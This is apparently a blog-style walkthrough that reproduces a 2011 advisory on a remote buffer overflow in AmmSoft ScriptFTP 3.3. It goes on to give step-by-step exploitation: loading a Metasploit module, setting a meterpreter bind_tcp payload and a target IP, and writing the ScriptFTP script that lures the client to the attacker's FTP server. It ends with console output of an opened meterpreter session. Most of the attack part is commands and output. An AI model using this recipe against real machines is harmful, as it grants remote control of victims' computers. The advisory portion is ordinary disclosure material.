AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability

AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error
CVE:
Remote: Yes
Local: No
Published: Sep 20 2011 12:00AM
Updated: Sep 30 2011 07:00AM
Credit: Tom Gregory
Vulnerable: AmmSoft ScriptFTP 3.3
URL : http://www.securityfocus.com/bid/49707
Description : ScriptFTP is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. ScriptFTP 3.3 is vulnerable; other versions may also be affected.

In order to exploit this you can either use the python or the metasploit exploit, I prefer using the the metasploit because of the payloads. So the first thing you need to do is put the exploit under the folder /pentest/exploits/framework3/modules/exploits/windows , I called mine scriptftp33.rb , just paste the content of
http://www.securityfocus.com/data/vulnerabilities/exploits/49707.rb

Now step by step
1) msfconsole
2) use windows/ftp/scriptftp33 ( To use the exploit that we just created)
3) set PAYLOAD windows/meterpreter/bind_tcp (To use meterpreter as our payload)
4) set RHOST 172.16.1.7 (This is the ip address of the server that I am attacking)
5) exploit

Ok, now the attacking server bit is ready to go, you need to download the ftp script from
http://www.scriptftp.com/ScriptFTP_3_3_setup.exe and install it
Open the scriptftp and create and script with the following content:

OPENHOST("172.16.1.79","ftptest","passwordtest")
SETPASSIVE(ENABLED)
GETLIST($list,REMOTE_FILES)
CLOSEHOST


172.16.1.79 = The ip address of the attacking server.
ftptest = username
passwordtest = password
Remember to create this user in your attacking server.
Save it as exploit.ftp
Now click open and select exploit.ftp
If everything goes all right, in your metasploit you now should see something like this :
msf exploit(scriptftp33) > [*] 172.16.1.7:1518 LOGIN ftptest / passwordtest
[*] - Data connection set up
[*] - Sending directory list via data connection
[*] Sending stage (752128 bytes) to 172.16.1.7
[*] Meterpreter session 1 opened (172.16.1.79:37594 -> 172.16.1.7:4444) at 2011-09-30 10:15:21

+0100

Right, now you have your meterpreter session, just type " sessions -i 1" and you can do everything you want ;)

That's it guys.